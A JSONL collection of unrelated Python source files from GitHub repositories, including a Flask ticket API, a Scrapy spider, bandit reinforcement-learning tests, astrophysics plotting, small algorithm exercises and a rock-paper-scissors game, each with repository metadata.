+{"seq_id":"72554343772","text":"#!/usr/bin/python3\nfrom __future__ import print_function, absolute_import\nfrom threading import Thread, Event\nfrom datetime import datetime, timedelta\n\nlistenPort = 9993\n\ndef singleton(cls):\n\tinstances = {}\n\tdef getinstance():\n\t\tif cls not in instances:\n\t\t\tinstances[cls] = cls()\n\t\treturn instances[cls]\n\treturn getinstance\n\nclass eventInfo(object):\n\tdef __init__(self, reached=False, new_delta=0, skew=0):\n\t\tself.reached = reached\n\t\tself.delta = new_delta\n\t\tself.skew = skew\n\nclass event(object):\n\tevent_dispatcher = 'scheduler'\n\tdef __init__(self, _time=None, t='', args=None, _id=0):\n\t\tself.time = _time\n\t\tself.cur = datetime.now()\n\t\tself.dtime = self.cur\n\t\tself.last = None\n\t\tself.id = _id\n\t\tself.args = args\n\t\tself.type = t\n\t\tself.active = True\n\t\tself.recalc = self.__getattribute__(t)\n\n\tdef __str__(self):\n\t\treturn \"\" % (str(self.time), self.op)\n\n\tdef every(self, new):\n\t\tif new >= self.dtime:\n\t\t\told = self.dtime\n\t\t\tself.dtime = self.cur\n\t\t\twhile self.dtime < new:\n\t\t\t\tself.dtime += self.time\n\t\t\tself.last = datetime.now()\n\t\t\treturn eventInfo(True, self.dtime - new, old - new)\n\t\telse:\n\t\t\treturn eventInfo(False, self.dtime - new)\n\n\tdef daily(self, new):\n\t\tif new > self.time:\n\t\t\told = self.time\n\t\t\tself.time += timedelta(days=1)\n\t\t\tself.last = datetime.now()\n\t\t\treturn eventInfo(True, self.time - new, old - new)\n\t\telse:\n\t\t\treturn eventInfo(False, self.time - new)\n\n\tdef reg_daily(self, new):\n\t\tif new > self.time:\n\t\t\told = self.time\n\t\t\tif new.isoweekday() < 5:\n\t\t\t\tself.time += timedelta(days=1)\n\t\t\telse:\n\t\t\t\tself.time += timedelta(days=8-new.isoweekday())\n\t\t\tself.last = datetime.now()\n\t\t\treturn eventInfo(True, self.time - new, old - new)\n\t\telse:\n\t\t\treturn eventInfo(False, self.time - new)\n\n@singleton\nclass eventScheduler(Thread):\n\tdef __init__(self):\n\t\tThread.__init__(self)\n\t\tself.wait_event = Event()\n\t\tself.event_list = []\n\t\tself.event_id = 0\n\t\tself.listeners = []\n\t\tself.daemon = True\n\t\tself.start()\n\n\tdef wake(self):\n\t\tself.wait_event.set()\n\n\tdef listen(self, cb):\n\t\tself.listeners.append(cb)\n\n\tdef unlisten(self, cb):\n\t\tself.listeners.remove(cb)\n\n\tdef activeEvents(self):\n\t\tactive = 0\n\t\tfor ev in self.event_list:\n\t\t\tif ev.active: active+=1\n\t\treturn active\n\n\tdef run(self):\n\t\twhile True:\n\t\t\tnext = self.handleEvents()\n\t\t\tif next != None:\n\t\t\t\tnext = next.total_seconds()\n\t\t\t\tprint('[SCHEDULER] %d event(s) queued, next wake-up: %fs' % (self.activeEvents(), next))\n\t\t\telse:\n\t\t\t\tprint('[SCHEDULER] No events queued, waiting for condition.')\n\t\t\tself.wait_event.wait(next)\n\t\t\tself.wait_event.clear()\n\n\tdef disableEvent(self, ev):\n\t\tev.active = False\n\t\tself.wake()\n\n\tdef enableEvent(self, ev):\n\t\tev.active = True\n\t\tself.wake()\n\n\tdef clearEvent(self, ev):\n\t\tself.event_list.remove(ev)\n\t\tself.wake()\n\n\tdef createEvent(self, event):\n\t\tself.event_list.append(event)\n\t\tself.wake()\n\t\tself.event_id += 1\n\t\tevent.id = self.event_id\n\t\treturn event\n\n\tdef handleEvents(self):\n\t\tcur = datetime.now()\n\t\tnext = None\n\t\tx = self.event_list\n\t\tfor ev in x:\n\t\t\tif not ev.active:\n\t\t\t\tcontinue\n\n\t\t\tt = ev.recalc(cur)\n\t\t\tif t.reached:\n\t\t\t\tprint('[SCHEDULER] Raising event %d, %fs overdue' % (ev.id, abs(t.skew.total_seconds())))\n\t\t\t\tfor i in self.listeners:\n\t\t\t\t\ti(ev)\n\n\t\t\tif t.delta == 0:\n\t\t\t\tself.event_list.remove(ev)\n\t\t\telif next == None or t.delta < next:\n\t\t\t\tnext = t.delta\n\t\treturn next\n","repo_name":"kennylevinsen/autohome","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33956414074","text":"\nfrom app.forms.department_form import DepartmentForm\nfrom app.forms.ticket_form import TicketForm\nfrom flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models.department import Department\nfrom app.models.ticket import Ticket\nfrom .auth_routes import validation_errors_to_error_messages\nfrom app.models import db\n\n\ndepartment_routes = Blueprint('departments', __name__)\n\n\n# get all departments\n@department_routes.route('/', methods=['GET'])\n@login_required\ndef get_departments():\n    all_departments = Department.query.order_by(Department.name.asc()).all()\n    departments = []\n    if (all_departments):\n        for i in range(len(all_departments)):\n            departments.append(all_departments[i].to_dict())\n        for dept in departments:\n            dept_tickets = []\n            tickets = Ticket.query.filter_by(\n                department_id=dept['id']).join(Department).all()\n            for ticket in tickets:\n                dept_tickets.append(ticket.to_dict())\n            dept['tickets'] = dept_tickets\n    return {'departments': departments}\n# edit department route\n\n\n@ department_routes.route('//edit', methods=['PUT'])\n@ login_required\ndef edit_department(id):\n    department = Department.query.get(id)\n    dept_tickets = Ticket.query.filter_by(\n        department_id=id).join(Department).all()\n    tickets = []\n    if dept_tickets:\n        for i in range(len(dept_tickets)):\n            tickets.append(dept_tickets[i].to_dict())\n    form = DepartmentForm()\n    form['csrf_token'].data = request.cookies['csrf_token']\n    if form.validate_on_submit():\n        department.name = form.name.data.capitalize()\n        db.session.commit()\n        dict_dept = department.to_dict()\n        dict_dept['tickets'] = tickets\n        return dict_dept\n    return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n\n# get one department route\n\n\n@ department_routes.route('/', methods=['GET'])\n@ login_required\ndef get_one_department(id):\n    dept = Department.query.get(id)\n    dict_dept = dept.to_dict()\n    dept_tickets = Ticket.query.filter_by(\n        department_id=id).join(Department).all()\n    tickets = []\n    if dept_tickets:\n        for i in range(len(dept_tickets)):\n            tickets.append(dept_tickets[i].to_dict())\n    dict_dept['tickets'] = tickets\n    return dict_dept\n\n# delete department\n\n\n@ department_routes.route('//delete', methods=['DELETE'])\n@ login_required\ndef deleteDepartment(departmentId):\n    dept = Department.query.filter_by(\n        id=departmentId).first()\n\n    db.session.delete(dept)\n    db.session.commit()\n    return dept.to_dict()\n\n# create department\n\n\n@ department_routes.route('/', methods=['POST'])\n@ login_required\ndef newDepartment():\n    form = DepartmentForm()\n    form['csrf_token'].data = request.cookies['csrf_token']\n    if form.validate_on_submit():\n        dept = Department(\n            name=form.name.data.capitalize(),\n        )\n        db.session.add(dept)\n        db.session.commit()\n        return dept.to_dict()\n    return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n\n\n# GET tickets of a department\n@ department_routes.route('//tickets')\n@ login_required\ndef getTicket(departmentId):\n    allTickets = Ticket.query.order_by(Ticket.id.asc()).filter_by(\n        department_id=departmentId).join(Department).all()\n    tickets = []\n    if(allTickets):\n        for i in range(len(allTickets)):\n            tickets.append(allTickets[i].to_dict())\n    return {'tickets': tickets}\n\n\n# ADD A TICKET TO A Department\n@ department_routes.route('//user//tickets', methods=['POST'])\n@ login_required\ndef newTicket(departmentId, userId):\n    form = TicketForm()\n    form['csrf_token'].data = request.cookies['csrf_token']\n    if form.validate_on_submit():\n        ticket = Ticket(\n            item_name=form.item_name.data.capitalize(),\n            location=form.location.data,\n            description=form.description.data.capitalize(),\n            department_id=departmentId,\n            owner_id=userId)\n        db.session.add(ticket)\n        db.session.commit()\n        return ticket.to_dict()\n    return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n","repo_name":"DylanWelzel/Kostko-Connect","sub_path":"app/api/departments.py","file_name":"departments.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"24428404384","text":"import numpy as np\r\na=[]\r\nz=100000\r\nfor i in range(90000,z-1):\r\n    \r\n    for j in range (i+1,z):\r\n        i2=i*i\r\n        j2=j*j\r\n        n1= pow((i2+j2), 0.5)\r\n        if n1%1==0:\r\n            a.append(i2)\r\n            a.append(j2)\r\n    print(i)\r\na=np.array(a) \r\nnp.save(r'C:\\Users\\1\\Desktop\\example_1.npy', a)\r\nb=[]\r\nfor i in range(1,2*z):\r\n    b.append(i*i)\r\nnp.save(r'C:\\Users\\1\\Desktop\\example_2.npy', b)\r\n","repo_name":"orby-tech/-","sub_path":"create_i*i_of numbers.py","file_name":"create_i*i_of numbers.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35491551345","text":"# coding=utf-8\n\nimport sys\nimport datetime\nimport os\nimport shutil\n\n\ndef copy_so():\n    src = so_copy_path + \"\\\\\" + project_name + \".so\"\n    dst = so_release_path + \"\\\\\" + baseline + \"\\\\\" + product_name + \".so\"\n    if not os.path.exists(src):\n        print(\"未上传so文件,请上传so文件\")\n        return 1\n    shutil.copy(src, dst)\n    return 0\n\n\nif __name__ == '__main__':\n    product_name = sys.argv[1]\n    project_name = sys.argv[2]\n\n    so_copy_path = \"D:\\\\D:\\SO_RELEASE\"\n    so_release_path = \"\\\\\\\\10.250.115.51\\\\APK_Release_Version\\\\03-product\\\\{0}\\\\{1}\".format(product_name, project_name)\n\n    baseline = datetime.datetime.now().strftime(\"%Y.%m.%d_%H.%M\")\n\n    exit_code = copy_so()\n\n    if exit_code == 1:\n        print(\"so发布失败!!!\")\n        sys.exit(1)\n\n    print(\"SO发布成功,发布地址为:{0}\".format(so_release_path + \"\\\\\" + baseline))\n\n\n\n","repo_name":"AndrewChan1988/PythonScriptForWork","sub_path":"ApkAutoIntegration/so_release.py","file_name":"so_release.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"39381608846","text":"# _*_ coding:utf-8 _*_\n#GVIM 添加汉字注释\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport scrapy\nfrom ..items import TestScrapyItem\n\nclass test1Spider(scrapy.Spider):\n    name ='test_scrapy' #新建爬虫\n    start_urls=['http://bj.ganji.com/fang1/chanyang/'] #定义初始连接\n\n    def parse(self,response):\n        test=TestScrapyItem()\n        title_list=response.xpath(\".//div[@class='f-list-item ']/dl/dd[1]/a/text()\").extract()\n        money_list=response.xpath(\".//div[@class='f-list-item ']/dl/dd[5]/div[1]/span[1]/text()\").extract()\n        for i in range(0,len(title_list)):\n            test['title']=title_list[i]\n            test['money']=money_list[i]\n            yield test\n\n","repo_name":"peterbanban/RentalInformation","sub_path":"test_scrapy/spiders/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
\n \"\"\"\n test_env_size = 5\n test_bandits = [Bandit(i ** 2, i) for i in range(test_env_size)]\n test_env = BanditsEnvironment(test_bandits)\n test_len = 1000\n\n selected_bandit = 4\n test_rewards = [test_env.take_action(\n selected_bandit) for _ in range(test_len)]\n\n plt.plot(test_rewards, label='rewards')\n plt.plot((selected_bandit ** 2 + selected_bandit) *\n np.ones(test_len), linestyle='--', color='r')\n plt.plot((selected_bandit ** 2 - selected_bandit) *\n np.ones(test_len), linestyle='--', color='r')\n\n plt.show()\n\n test_rewards = [test_env.take_action(\n random.randint(0, 4)) for _ in range(test_len)]\n test_mean = sum(test_rewards) / test_len\n\n print(\"TEST MEAN = \", test_mean)\n\n def test_decision_policies(self) -> None:\n \"\"\"\n Testing decision policies.\n \"\"\"\n test_q = [1, 2, 3, 2, 1]\n test_len = 1000\n\n plt.subplot(3, 1, 1)\n plt.plot([GreedyPolicy.action(q=test_q) for _ in range(test_len)])\n plt.subplot(3, 1, 2)\n plt.plot([RandomPolicy.action(q=test_q) for _ in range(test_len)])\n plt.subplot(3, 1, 3)\n plt.plot([EpsGreedyPolicy.action(q=test_q, eps=0.1)\n for _ in range(test_len)])\n\n plt.show()\n\n def test_system(self) -> None:\n\n BANDITS_NO = 5\n ATTEMPTS_NO = 10000\n\n bandits = [Bandit(10 * (random.random() - 0.5), 5 *\n random.random()) for _ in range(BANDITS_NO)]\n sys = System(bandits)\n\n # *** 1. zadatak ***\n # Razlog manjeg nagiba jeste što smanjivanjem epsilon vrijednosti smanjujemo eksploraciju i držimo se\n # eksploatacije, te u tom slučaju kriva će biti bliža \"optimalnoj\".\n # Prikazujemo i grafik konvergencije, koji pokazuje suštinu epsilon greedy politike.\n\n print('*** 1. zadatak ***')\n\n test_eps = [0.7, 0.4, 0.1, 0.01]\n\n for eps in test_eps:\n q, q_evol, old_bandit_mean = sys.run_system(\n eps=eps, ATTEMPTS_NO=ATTEMPTS_NO)\n plotter = ConvergencePlot(\n q_evol=q_evol, eps=0.1, ATTEMPTS_NO=ATTEMPTS_NO)\n plotter.plot(env=sys.env)\n\n # *** 2. zadatak ***\n # Naučeno Q vs epsilon = 0.\n\n print('*** 2. zadatak ***')\n\n test_eps = [0.1, 0.0]\n\n for eps in test_eps:\n q, q_evol, old_bandit_mean = sys.run_system(\n eps=eps, ATTEMPTS_NO=ATTEMPTS_NO)\n\n # *** 3. zadatak ***\n # Šta ako su karakteristike bandita promjenljive u vremenu?\n # Definišimo zakon promjene srednjih vrijednosti (može biti stohastičke ili determinističke prirode).\n # U tom slučaju ima smisla davati veću težinu trenutnim nagradama\n # kako bi se pokušala pronaći trenutno optimalna akcija.\n # Stoga se zadaje težinski faktor ALPHA,\n # koji je već implementiran i u nestacionarnom slučaju.\n # Takođe je potrebno izmijeniti implementaciju klase BanditEnvironment\n # kako bismo dodali mogućnost mijenjanja okoline.\n\n print('*** 3. zadatak ***')\n\n bandits = [Bandit(10 * (random.random() - 0.5), 5 *\n random.random()) for _ in range(BANDITS_NO)]\n sys = System(bandits, stationary=False)\n CHANGE_AT = [4000, 6000, 9000]\n q, q_evol, old_bandit_mean = sys.run_system(\n eps=0.1, CHANGE_AT=CHANGE_AT)\n\n # *** 4. zadatak ***\n # Konvergencija Q vrijednosti ka srednjoj vrijednosti bandita. U ovom slučaju\n # uzimamo prethodni sistem koji je stohastičke prirode, te ćemo dobiti\n # ponašanje da Q vrijednosti pokušavaju konvergirati ka srednjoj vrijednosti.\n\n print('*** 4. zadatak ***')\n plotter = ConvergencePlot(\n q_evol=q_evol, eps=0.1, ATTEMPTS_NO=ATTEMPTS_NO)\n plotter.plot(env=sys.env, CHANGE_AT=CHANGE_AT,\n old_bandit_mean=old_bandit_mean)\n\n\ndef main() -> None:\n unittest.main()\n\n\nif __name__ == '__main__':\n print(\"Hi! 
I am testing these bandits!\")\n","repo_name":"usernamenenad/Reinforcement-Learning-Course","sub_path":"domaci1/src/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42510581873","text":"import io\nimport os\n\nfrom wellcadformats.arraydata import WAF, WAI\nfrom wellcadformats.curvedata import WAW\n\nfrom wellcadformats.wa import Comments\n\n__version__ = '0.1'\n\n\nclass UnknownFormat(IOError):\n pass\n\n\ndef read(file_object, fmt=None):\n if os.path.isfile(str(file_object)):\n fmt = os.path.splitext(file_object)[1][1:]\n file_object = open(file_object, 'r')\n read_functions = {\n 'waf': WAF,\n 'wai': WAI,\n 'waw': lambda fobj: WAW(file_obj=fobj),\n 'wca': WCA\n }\n fmt = fmt.lower()\n print('fmt: {}'.format(fmt))\n print('file_object: {}'.format(file_object))\n return read_functions[fmt](file_object)\n\n\n\nclass MultipleExport(object):\n def __init__(self, path=None):\n self.datasets = []\n if not path is None:\n self.read(path)\n\n def read(filename):\n try:\n dset = formats.read(fn)\n self.datasets.append(dset)\n except formats.UnknownFormat:\n pass\n self.refresh()\n\n def readpath(path):\n fns = glob.glob(os.path.join(path, '*.w??'))\n self.readfiles(fns)\n \n def readfiles(*fns):\n for fn in fns:\n self.read(fn)\n\n def refresh(self):\n import pandas as pd\n df = pandas.DataFrame()\n for dset in self.datasets:\n if isinstance(dset, WAW):\n self.waw_datasets.append(dset)\n for i, dset in enumerate(self.waw_datasets):\n \n if not index_key in indices:\n indices[index_key] = 1\n else:\n indices[index_key] += 1\n\n\n\nclass WCA(object):\n def __init__(self, file_object):\n self.file_object = file_object\n self.reload(file_object)\n \n\n def open(self, log_name):\n for fn in self.contents.keys():\n if fn.startswith(log_name):\n return read(self.contents[fn], fmt=os.path.splitext(fn)[1][1:])\n\n def seek(self, n=0):\n for file_object in self.contents.values():\n file_object.seek(n)\n \n def reload(self, file_object):\n inner_files = {}\n current_log = None\n for i, line in enumerate(file_object):\n if line.startswith('~LOG:'):\n if current_log:\n inner_files[current_log].seek(0)\n current_log = line.split(':')[1].strip()\n inner_files[current_log] = io.StringIO()\n else:\n if current_log:\n inner_files[current_log].write(line)\n self.contents = inner_files","repo_name":"kinverarity1/wellcadformats","sub_path":"wellcadformats/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70502053853","text":"import h5py\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.integrate as integrate\nfrom scipy.integrate import simps\nfrom matplotlib import gridspec\nimport statistics\nfrom array import *\nfrom scipy.interpolate import interp1d\nfrom numpy import diagonal\n\nlight_time = \"light_time.h5\"\nperiod = 25796\n\nwith h5py.File(light_time, \"r\") as f:\n # List all groups\n print(\"Keys: %s\" % f.keys())\n LC_key = list(f.keys())[0]\n phase_key = list(f.keys())[1]\n time_key = list(f.keys())[2]\n\n # Get the data\n LC = np.array(list(f[LC_key]))\n LC = LC[:,::-1]\n phase = np.array(list(f[phase_key]))\n time = np.array(list(f[time_key]))/period\n\n#print(LC.shape, time.shape)\n\n# LC = LC[2580:,:]\n# time=time[2580:]\n\n####### getting diagonal LC ##################\nLC = LC[2580:,:]\ninit_ph = 
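# A self-contained epsilon-greedy sketch. It does not reuse the `bandit` module the
# tests above import (its Bandit/System internals are not shown here); it only
# illustrates the exploration/exploitation trade-off those tests exercise.
import random

def eps_greedy(q, eps):
    """With probability eps explore a random arm, otherwise exploit argmax(q)."""
    if random.random() < eps:
        return random.randrange(len(q))
    return max(range(len(q)), key=lambda a: q[a])

q = [0.0] * 5
counts = [0] * 5
true_means = [0.1, 0.5, 0.9, 0.3, 0.7]  # made-up arm means
for _ in range(10000):
    a = eps_greedy(q, eps=0.1)
    reward = random.gauss(true_means[a], 1.0)
    counts[a] += 1
    q[a] += (reward - q[a]) / counts[a]  # incremental sample-average update
print(q)  # q[2] should approach 0.9, the best arm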
np.arange(0,1,1./52.)\nLC_int = np.empty((512,512))\nLC_diag = np.empty((len(time[2580:3437]),len(phase)))\nfor ti in range(len(time[2580:3437])):\n if ti%100 == 0:\n print('%' + str(50/67.63 + ti/len(time)) + '...')\n if ti == 3437-2600:\n print('Almost there...')\n LC_dummy = LC[ti:ti+52,:]\n for ph in range(len(phase)):\n dummy = interp1d(init_ph, LC_dummy[:,ph], fill_value=\"extrapolate\")\n LC_int[:,ph] = dummy(phase)\n LC_diag[ti] = diagonal(LC_int)\n\nLC = LC_diag.copy()\ntime=time[2580:3437]\n\n# average\n\nLC_ave = np.zeros((len(phase),))\nfor ph in range(len(phase)):\n LC_dumb = simps(LC[:,ph], x=time)/(66.62-50.0)\n LC_ave[ph] = LC_dumb\n\nnorm_const = np.max( LC_ave)\nprint(norm_const)\n\nLC_data = LC #2063\ndata_var = []\ndata_var_dummy = np.empty(512)\nfor dat in range(len(phase)):\n data_var_dummy = statistics.pstdev(LC_data[:,dat])\n data_var = np.append(data_var,data_var_dummy)\n####################LC mesh##############################\nline_a = 64.2\n\nfig,ax1 = plt.subplots(1,figsize=(4.5,10))\ngs = gridspec.GridSpec(2, 1, height_ratios=[2, 1])\nax1 = fig.add_subplot(111)\nax1 = plt.subplot(gs[1])#, sharex = ax0)\nax0 = plt.subplot(gs[0], sharex = ax1)\n\nax0.vlines(0.23, ymin=50.0, ymax=67.63, colors='red', linestyles='dashed', label='1', linewidth=1.5)\nax0.vlines(0.29, ymin=50.0, ymax=67.63, colors='red', linestyles='dashed', label='2', linewidth=1.5)\nax0.vlines(0.36, ymin=50.0, ymax=67.63, colors='red', linestyles='dashed', label='3', linewidth=1.5)\n#ax0.hlines(57, xmin=0.0, xmax=1.0, colors='white', linestyles='dashed', label='a', linewidth=1.5)\n#ax0.hlines(66.15, xmin=0.0, xmax=1.0, colors='white', linestyles='dashed', label='b', linewidth=1.5)\nax0.hlines(line_a, xmin=0.0, xmax=1.0, colors='white', linestyles='dashed', label='a', linewidth=1.5)\nax0.text(0.18, 53, '1', fontsize=15, color='red')\nax0.text(0.24, 53, '2', fontsize=15, color='red')\nax0.text(0.31, 53, '3', fontsize=15, color='red')\nax0.text(0.1, line_a+0.1, 'a', fontsize=15, color='white')\n\nim = ax0.pcolormesh(phase,time,LC,cmap='jet', vmax=0.25, vmin=0)\nax0.set_ylim(ymin=50, ymax= 66.62)\ncax = fig.add_axes([0.125, 0.89, 0.77, 0.01]) \ncbar = fig.colorbar(im, orientation='horizontal', cax = cax)\ncbar.set_ticks([0, 0.5*norm_const, norm_const, 1.5*norm_const, 2*norm_const])\ncbar.set_ticklabels([0,0.5,1,1.5,2])\ncax.xaxis.set_ticks_position('top')\nax0.set_ylabel('Time [number of periods]',fontsize=15)\n\ntime_slice = int((3437-2580)*(line_a-50)/(66.62-50)) # int(3489*56/67.67)\n\nax1.plot(phase, LC[time_slice,:], color='darkorange', label='line a', linewidth=2.0)\nax1.plot(phase, LC_ave, label='average', color='black', linewidth=1.0, linestyle='-')\nax1.set_ylim(ymin = 0.0, ymax = 0.2)\nax1.set_yticks([0.25*norm_const, 0.5*norm_const, 0.75*norm_const, norm_const, 1.25*norm_const])\nax1.set_yticklabels([0.25, 0.5, 0.75, 1.0, 1.25])\n\nax1.fill_between(phase, (LC_ave-data_var), (LC_ave+data_var), alpha=0.15, facecolor='blue', label='std deviation')\n\nax1.set_xlabel('Phase', fontsize=15)\nax1.set_ylabel('Normalized Flux',fontsize=15)\nax1.legend(loc='upper left')#, bbox_to_anchor=(-0.01, 1.02))\nax1.set_xlim(xmin = 0.0, xmax = 1.0)\nplt.subplots_adjust(hspace=0)\nplt.setp(ax0.get_xticklabels(), visible=False)\n\nplt.savefig('LCs_v3_diag-50.png', bbox_inches='tight', 
dpi=300)\nplt.show()","repo_name":"icandac/pulsar_intra-pulse_variability","sub_path":"LCs-mapA.py","file_name":"LCs-mapA.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30012575387","text":"\npi_digits = [3,1,4,1,5,9,2,6,5,3,5,8,9,7,9]\ndef pilish_string(txt, digit_idx = 0):\n if len(txt) == 0 or digit_idx >= len(pi_digits):\n return \"\"\n tarLen = pi_digits[digit_idx]\n if len(txt) >= tarLen:\n temp = pilish_string(txt[tarLen:], digit_idx + 1)\n if len(temp) == 0:\n return txt[:tarLen]\n else:\n return txt[:tarLen] + \" \" + temp\n else:\n return txt + txt[-1] * (tarLen - len(txt))\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"sHJmjMcZPiCsEujk6_23.py","file_name":"sHJmjMcZPiCsEujk6_23.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31263089227","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 26 10:40:35 2016\n\n@author: AbreuLastra_Work\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\nloansData = pd.read_csv('loansData.csv')\n\n# Droping missing observations\nloansData.dropna(inplace=True)\n\n# Cleaning the variable Interest.Rate, removing percentage point. \ncleanInterestRate = loansData['Interest.Rate'].map(lambda x: round(float(x.rstrip('%')) / 100, 4))\nloansData['Interest.Rate'] = cleanInterestRate\n\n# Setting Home.Ownership\n#loansData['Home_Ownership_ord'] = pd.Categorical(loansData['Home.Ownership']).labels\n# base case mortgate\ndummies = pd.get_dummies(loansData['Home.Ownership'],drop_first=True)\nloansData['Own_other'] = dummies['OTHER']\nloansData['Own_own'] = dummies['OWN']\nloansData['Own_rent'] = dummies['RENT']\n\nloansData['Int_inc_other'] = loansData['Own_other'] * loansData['Monthly.Income']\nloansData['Int_inc_own'] = loansData['Own_own'] * loansData['Monthly.Income']\nloansData['Int_inc_rent'] = loansData['Own_rent'] * loansData['Monthly.Income']\n\n# Setting the dependent variable \ny = loansData['Interest.Rate']\n\n# Setting different matrixes for independent variables\n\nX_1 = loansData['Monthly.Income']\nX_2 = loansData[['Monthly.Income', 'Own_other', 'Own_own', 'Own_rent']]\nX_3 = loansData[['Monthly.Income', 'Own_other', 'Own_own', 'Own_rent', 'Int_inc_other', 'Int_inc_own', 'Int_inc_rent']]\n# fit an OLS model\n\nX_1 = sm.add_constant(X_1) \nest_1 = sm.OLS(y,X_1).fit()\n\n\nprint (est_1.summary())\n\nX_2 = sm.add_constant(X_2) \nest_2 = sm.OLS(y,X_2).fit()\n\n\nprint (est_2.summary())\n\nX_3 = sm.add_constant(X_3) \nest_3 = sm.OLS(y,X_3).fit()\n\n\nprint (est_3.summary())","repo_name":"abreulastra/2_lesson_5_2","sub_path":"multivariate.py","file_name":"multivariate.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33221075670","text":"#A palindromic number reads the same both ways. 
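# The loansData regression above hand-builds dummy and interaction columns;
# statsmodels' formula API (imported there as smf but never used) can express the
# same model in one line. A toy sketch; this frame and its values are made up.
import pandas as pd
import statsmodels.formula.api as smf

toy = pd.DataFrame({
    'rate':   [0.10, 0.12, 0.09, 0.15, 0.11, 0.13, 0.08, 0.14, 0.10],
    'income': [4000, 3500, 5000, 2500, 4200, 3100, 5500, 2700, 3900],
    'own':    ['RENT', 'OWN', 'MORTGAGE'] * 3,
})
# 'income * C(own)' expands to main effects plus income-by-ownership interactions,
# with one ownership level absorbed as the base case (as in the script above).
fit = smf.ols('rate ~ income * C(own)', data=toy).fit()
print(fit.params)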
The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\r\n#Find the largest palindrome made from the product of two 3-digit numbers.\r\n\r\ndef create_list(a):\r\n#function to convert integer values into list\r\n    a = str(a)\r\n    xyz = []\r\n    for i in a:\r\n        i = int(i)\r\n        xyz.append(i)\r\n    return xyz\r\nfor i in range(900009,998001):\r\n#iterating from an arbitrary lower value up to 998001 (= 999 * 999), the largest product of two 3-digit numbers.\r\n#the range between these values must contain multiple palindromic numbers\r\n\r\n    x = create_list(i)\r\n    if x[0] == x[5] and x[1] == x[4] and x[2]== x[3]:\r\n        b = ''\r\n        for i in x:\r\n            b += str(i)\r\n        b = int(b)\r\n        c = 999\r\n        while b%c != 0 and c>=100:\r\n            c = c-1\r\n        if b/c < 1000:\r\n            print(c,b)\r\n","repo_name":"premota/mathematical-problems","sub_path":"palindromic problem.py","file_name":"palindromic problem.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38573113119","text":"#User function Template for python3\n\nclass Solution:\n    def longestCommonSubstr(self, S1, S2, n, m):\n        # code here\n\n        dp =[[0]*(m+1) for _ in range(n+1)]\n        \n        for i in range(n+1):\n            dp[i][0]=0\n        \n        for j in range(m+1):\n            dp[0][j]=0\n        \n        maxi =0\n        \n        for i1 in range(1,n+1):\n            for i2 in range(1,m+1):\n                \n                if S1[i1-1]==S2[i2-1]:\n                    dp[i1][i2] = 1+dp[i1-1][i2-1]\n                    maxi=max(maxi, dp[i1][i2])\n                else:\n                    dp[i1][i2] =0\n        \n        return maxi\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__=='__main__':\n    t=int(input())\n    for _ in range(t):\n        n,m = input().strip().split(\" \")\n        n,m = int(n), int(m)\n        S1 = input().strip()\n        S2 = input().strip()\n        \n        \n        ob=Solution()\n        print(ob.longestCommonSubstr(S1, S2, n, m))\n# } Driver Code Ends","repo_name":"iamheavymetalx7/LeetCode-Submissions","sub_path":"Longest Common Substring - GFG/longest-common-substring.py","file_name":"longest-common-substring.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39502166487","text":"#Rock Paper Scissors game\r\n\r\nimport random\r\nimport time\r\n\r\nprint(\"Welcome to Rock Paper Scissors!\")\r\ntime.sleep(2)\r\nprint(\"\\nRules:\\n Game is best 2 out of 3\\n Type R for Rock, P for Paper, and S for Scissors\")\r\ntime.sleep(2)\r\n\r\nturns_left = 3\r\nuser_score = 0\r\ncomputer_score = 0\r\n\r\nwhile turns_left > 0 and user_score < 2 and computer_score < 2:\r\n    \r\n    comp_answer = random.randint(1,3)\r\n    ## 1=R, 2=P, 3=S\r\n    user_answer = input(\"\\nPick [R]ock, [P]aper, or [S]cissors: \")\r\n\r\n    ##user wins scenarios\r\n    if user_answer == \"R\" and comp_answer == 3:\r\n        print(\"\\nComputer picks Scissors...Rock smashes scissors, YOU WIN!\")\r\n        user_score = user_score + 1\r\n        turns_left = turns_left - 